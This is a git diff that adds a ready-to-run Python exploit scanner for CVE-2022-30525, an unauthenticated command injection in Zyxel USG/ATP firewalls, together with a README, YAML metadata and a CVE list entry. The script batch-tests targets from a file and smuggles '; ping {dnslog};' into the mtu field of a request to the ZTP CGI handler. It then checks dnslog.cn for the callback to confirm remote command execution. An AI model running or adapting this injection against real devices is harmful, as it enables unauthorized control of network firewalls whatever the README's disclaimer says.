diff --git a/.DS_Store b/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..d7aa354b0703b6d995a4434011fde166e69e8909
Binary files /dev/null and b/.DS_Store differ
diff --git a/cve/Zyxel/.DS_Store b/cve/Zyxel/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..586237459d3d61e9d30161b2348bb984b7258f0e
Binary files /dev/null and b/cve/Zyxel/.DS_Store differ
diff --git a/cve/Zyxel/2022/.DS_Store b/cve/Zyxel/2022/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..df4051b002d19d2094d950b9dcd090d3307a19ea
Binary files /dev/null and b/cve/Zyxel/2022/.DS_Store differ
diff --git a/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py b/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py
new file mode 100644
index 0000000000000000000000000000000000000000..a2b09db68866b455746a46c252de64f59ceb8a79
--- /dev/null
+++ b/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py
@@ -0,0 +1,119 @@
+#!/usr/bin/env python
+# -*- conding:utf-8 -*-
+import requests
+import argparse
+import sys
+import urllib3
+import json
+import time
+import random
+import signal
+
+dnslog_res = requests.session()
+urllib3.disable_warnings()
+
+__desc__ = 'CVE-2022-30525利用dnslog批量验证'
+__author__ = 'savior'
+__date__ = '2022/05/14'
+__version__ = 'v0.1'
+__link__ = 'https://github.com/savior-only/CVE-2022-30525'
+
+
+def banner():
+ print("""
+ ██████ ██ ██ ████████ ████ ████ ████ ████ ████ ████ ██████ ████ ██████
+ ██░░░░██░██ ░██░██░░░░░ █░░░ █ █░░░██ █░░░ █ █░░░ █ █░░░ █ █░░░██░█░░░░ █░░░ █░█░░░░
+ ██ ░░ ░██ ░██░██ ░ ░█░█ █░█░ ░█░ ░█ ░ ░█░█ █░█░█████ ░ ░█░█████
+░██ ░░██ ██ ░███████ █████ ███ ░█ █ ░█ ███ ███ █████ ███ ░█ █ ░█░░░░░ █ ███ ░░░░░ █
+░██ ░░██ ██ ░██░░░░ ░░░░░ █░░ ░██ ░█ █░░ █░░ ░░░░░ ░░░ █░██ ░█ ░█ █░░ ░█
+░░██ ██ ░░████ ░██ █ ░█ ░█ █ █ █ ░█░█ ░█ █ ░█ █ █ ░█
+ ░░██████ ░░██ ░████████ ░██████░ ████ ░██████░██████ ░ ████ ░ ████ ░ ████ ░██████░ ████
+ ░░░░░░ ░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░░ ░░░░░░ ░░░░ ░░░░ ░░░░ ░░░░░░ ░░░░
+
+
+ by {} {}
+ {}
+ """.format(__author__, __version__, __link__))
+
+
+class Dnslog:
+
+ def get_dnslog():
+ t = random.random()
+ url = f"http://www.dnslog.cn/getdomain.php?t={t}"
+ res1 = dnslog_res.get(url=url, proxies=proxies)
+ if res1.status_code == 200 and "dnslog" in res1.text:
+ dnslog = res1.text
+ return dnslog
+ else:
+ print("获取dnslog失败")
+
+
+ def get_data():
+ t = random.random()
+ url = f"http://www.dnslog.cn/getrecords.php?t={t}"
+ res2 = dnslog_res.get(url=url, proxies=proxies)
+ return res2.text
+
+class information(object):
+
+ def __init__(self,args):
+ self.args = args
+ self.url = args.url
+ self.file = args.file
+
+ def target_url(self):
+ target_url = self.url + "/ztp/cgi-bin/handler"
+ headers = {
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
+ "Content-Type": "application/json"
+ }
+ dnslog = Dnslog.get_dnslog()
+ data = {"command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f"; ping {dnslog};", "data": "hi"}
+ try:
+ res = requests.post(url=target_url, headers=headers, data=json.dumps(data), verify=False, proxies=proxies, timeout=5)
+ except Exception as e:
+ pass
+
+ time.sleep(5)
+ data = Dnslog.get_data()
+ if dnslog in data:
+ print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Zyxel 防火墙未经身份验证的远程命令注入\033[0m")
+ print("[" + "-"*100 + "]")
+ else:
+ print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在Zyxel 防火墙未经身份验证的远程命令注入!")
+ print("[" + "-"*100 + "]")
+
+ def file_url(self):
+ with open(self.file, "r") as urls:
+ for url in urls:
+ url = url.strip()
+ if url[:4] != "http":
+ url = "http://" + url
+ self.url = url.strip()
+ information.target_url(self)
+
+
+if __name__ == "__main__":
+ try:
+ banner()
+ parser = argparse.ArgumentParser(description='Zyxel 防火墙未经身份验证的远程命令注入', add_help=False)
+ parser.add_argument("-h", "--help", action="help", help="Show this help message and exit")
+ parser.add_argument("-u", "--url", type=str, dest="url", help="Target url eg:\"http://127.0.0.1\"")
+ parser.add_argument("-f", "--file", dest="file", help="Targets in file eg:\"url.txt\"")
+ parser.add_argument("-proxy", dest="proxy", help="Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)")
+ args = parser.parse_args()
+ if args.proxy:
+ proxies = {"http": args.proxy, "https": args.proxy}
+ print("\033[31m[+] use proxy: {}\033[0m".format(args.proxy))
+ if args.url:
+ information(args).target_url()
+ elif args.file:
+ information(args).file_url()
+ #检测ctrl+c
+ except KeyboardInterrupt:
+ print("\n\033[31mYou choose to stop me.\033[0m")
+
+
+
+
diff --git a/cve/Zyxel/2022/CVE-2022-30535/README.md b/cve/Zyxel/2022/CVE-2022-30535/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..1a19e2e4f7838ecf127ff2d5bb466fd022124c05
--- /dev/null
+++ b/cve/Zyxel/2022/CVE-2022-30535/README.md
@@ -0,0 +1,30 @@
+# CVE-2022-30525
+Zyxel 防火墙未经身份验证的远程命令注入
+
+## 影响版本
+
+### 影响组件
+
+USG FLEX 100, 100W, 200, 500, 700
+USG20-VPN, USG20W-VPN
+ATP 100, 200, 500, 700, 800
+
+### 固件版本
+
+ZLD5.00 thru ZLD5.21 Patch 1
+ZLD5.10 thru ZLD5.21 Patch 1
+ZLD5.10 thru ZLD5.21 Patch 1
+
+## update
+
+-proxy
+
+
+
+## From
+https://github.com/Henry4E36/CVE-2022-30525
+
+
+# ⚠️ 免责声明
+
+此工具仅作为网络安全攻防研究交流,请使用者遵照网络安全法合理使用! 如果使用者使用该工具出现非法攻击等违法行为,与本作者无关!
diff --git a/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..401981c49eb0f7367bc234d66a3ccc5d750a0e0a
--- /dev/null
+++ b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-30525
+source: https://github.com/savior-only/CVE-2022-30525
+info:
+ name: Zyxel 防火墙未经身份验证的远程命令注入。
+ severity: critical
+ description:
+ A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
+ scope-of-influence:
+ firmware versions 5.00 ~ 5.21
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2022-30525
+ - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-30525
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-30525
+ cwe-id: CWE-78
+ cnvd-id: None
+ kve-id: None
+ tags: cve2022, Vendor Advisory, VDB Entry, firmware
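Review bot: `cnvd-id: None` and `kve-id: None` in the `classification` block of the YAML hunk are parsed as the string `"None"`, not as a YAML null, so a consumer that checks whether those ids are absent will see a non-empty value; write `cnvd-id: null` and `kve-id: null`, or drop the two keys. `scope-of-influence` summarises the range as `firmware versions 5.00 ~ 5.21`, while the `description` directly above it lists VPN series firmware from 4.60 through 5.21 Patch 1, so the summary understates the range this same file states. The multi-line `description` is written as a plain scalar continued on the following line, which YAML accepts, but `description: >` with a folded block scalar would make that intent explicit.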
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 525f67acfbf87bfc74cb7820812296b92e40c764..d0af7b2e27590ac5f80f734f7cb32682c84dd54c 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -131,6 +131,8 @@ cve:
 - CVE-2022-31692
 Zimbra:
 - CVE-2022-27925
+ Zyxel:
+ - CVE-2022-30525
 cnvd:
 apache-tomcat:
 - CNVD-2020-10487